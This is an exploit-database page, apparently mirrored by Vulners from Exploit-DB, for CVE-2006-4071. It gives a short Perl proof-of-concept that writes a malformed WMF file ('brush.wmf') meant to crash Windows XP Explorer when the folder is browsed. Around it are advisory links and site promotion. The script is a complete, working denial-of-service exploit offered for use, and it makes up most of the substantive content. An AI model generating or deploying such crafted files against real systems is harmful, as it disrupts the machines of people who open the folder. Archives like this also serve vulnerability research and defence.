Lucene search
+L

Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service

🗓️ 13 Jan 2007 00:00:00Reported by cyanid-EType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Microsoft Windows WMF CreateBrushIndirect DoS exploi

Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Preemptive Protection against Microsoft Windows WMF File Handling Denial of Service Vulnerability
13 Aug 200600:00
checkpoint_advisories
Check Point Advisories
Internet Explorer WMF CreateBrushIndirect DoS - Ver2 (CVE-2006-4071)
28 Dec 201400:00
checkpoint_advisories
CVE
CVE-2006-4071
10 Aug 200601:00
cve
Cvelist
CVE-2006-4071
10 Aug 200601:00
cvelist
NVD
CVE-2006-4071
10 Aug 200601:04
nvd
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

# milw0rm.com [2007-01-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 22.6
EPSS0.23995
35